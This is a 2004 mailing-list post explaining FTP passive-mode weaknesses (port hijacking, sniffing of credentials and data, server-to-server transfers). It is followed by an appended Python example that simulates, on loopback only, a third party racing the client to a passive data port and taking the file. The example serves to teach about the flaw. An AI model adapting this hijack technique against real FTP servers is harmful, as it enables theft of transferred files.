ANN: FTP Commander (the ftp browser Frank asked for...)

Frank D. Engel, Jr. fde101 at fjrhome.net
Wed Sep 8 10:24:36 EDT 2004


>  I never researched packet capture and those "security auditing"
>  tools... the thing that scares me most is the fact that when in passive
>  mode, the server will start listening on a data port and accepts any
>  connection without checking if the data port client is the same one on
>  the control port, and it will send the file to that client; file theft
>  is just a matter of being there at the right time... very scary...

This can be a useful feature, though.  You can directly transfer files 
from one server to another by setting one to active and the other to 
passive mode, and taking the port number and IP address of one and 
feeding it to the other in order to have the data connection directly 
opened between them.  That way, the data is only sent across the 
network once, rather than being downloaded to your computer, then 
uploaded to the other server.  It can be even more significant if there 
is a faster network between the two servers than between the client and 
either of the servers.

However, for security purposes, the situation is even worse than you 
seem to think.  Not only could someone else on the network "sniff" the 
passwords...   they could sniff the port numbers and IP addresses of 
the connections too.

What's more, they wouldn't have to "hijack" the file by connecting to 
the port you establish.  Assume someone did -- you might guess that 
something was wrong, or at least know to check, because your client 
would fail trying to make the connection, and the server would report 
back through the control connection that the transfer was complete.

If they just sniff the data connection itself and record the packets, 
they could reconstruct the file as you receive it yourself, and you 
might not have a clue that it happened.


FTP is *very* insecure, and is really only good for downloads of 
public files, or for transfers across "trusted" networks.


eMail protocols are plaintext too, btw...  often including plaintext 
passwords, or perhaps no passwords at all in some cases.   VERY scary.



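The passive-mode weakness described in the message above, reduced to a runnable demonstration. This is an added example and is not code from the original post or from FTP Commander; it simulates the data connection on loopback rather than talking to a real FTP server. The 227 reply and the file contents are constructed sample data, and the function names are my own. It shows three things from the thread: how the IP address and port are carried in the clear in the `227` reply (and can therefore be sniffed), how the same numbers are fed to a second server as a `PORT` command for the server-to-server transfer Frank describes, and how a passive data port hands the file to whoever connects first, leaving the real client with a refused connection.

```python
"""Simulated FTP passive-mode data connection and the hijack it permits (example code)."""
import re
import socket
import threading

# Constructed sample of a 227 reply as it appears, unencrypted, on the control connection.
SAMPLE_PASV_REPLY = "227 Entering Passive Mode (192,0,2,10,195,80)"

_PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_pasv(reply: str):
    """Extract (ip, port) from a 227 reply; the port is p1*256 + p2 (RFC 959)."""
    m = _PASV_RE.search(reply)
    if not reply.startswith("227") or not m:
        raise ValueError("not a 227 passive-mode reply")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def port_command(ip: str, port: int) -> str:
    """Build the PORT command that tells the *other* server where to open the data
    connection, i.e. the server-to-server transfer trick from the message above."""
    return "PORT " + ",".join(ip.split(".") + [str(port // 256), str(port % 256)])


def passive_data_server(payload: bytes):
    """Stand in for a server in passive mode: listen on an ephemeral loopback port and
    send `payload` to the first peer that connects.  Returns (port, thread)."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)
    port = lsock.getsockname()[1]

    def serve():
        conn, _peer = lsock.accept()  # no check that _peer is the control-connection client
        with conn:
            conn.sendall(payload)
        lsock.close()  # one transfer per PASV, exactly like a real server

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


def fetch(port: int, timeout: float = 2.0) -> bytes:
    """Connect to the data port and read to EOF: what the client does, and what a thief does."""
    with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demonstrate_hijack(payload: bytes):
    """Third party connects first and receives the file; the legitimate client, arriving
    second, finds the listener gone.  Returns (stolen_bytes, legit_bytes, legit_error)."""
    port, t = passive_data_server(payload)
    stolen = fetch(port)  # attacker who sniffed the 227 reply races the client
    t.join()
    try:
        legit = fetch(port)  # real client: connection refused, the only hint it gets
        legit_error = None
    except OSError as e:
        legit, legit_error = b"", type(e).__name__
    return stolen, legit, legit_error


if __name__ == "__main__":
    ip, port = parse_pasv(SAMPLE_PASV_REPLY)
    print("sniffed data endpoint:", ip, port)
    print("command for the second server:", port_command(ip, port))
    stolen, legit, err = demonstrate_hijack(b"constructed sample file contents\n")
    print("thief got %d bytes; client got %d bytes (%s)" % (len(stolen), len(legit), err))
```

Note that the hijacker only wins the race to the port; as the message points out, a passive sniffer on the same segment needs no race at all, since the data connection itself is unencrypted and can be recorded without disturbing the transfer.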


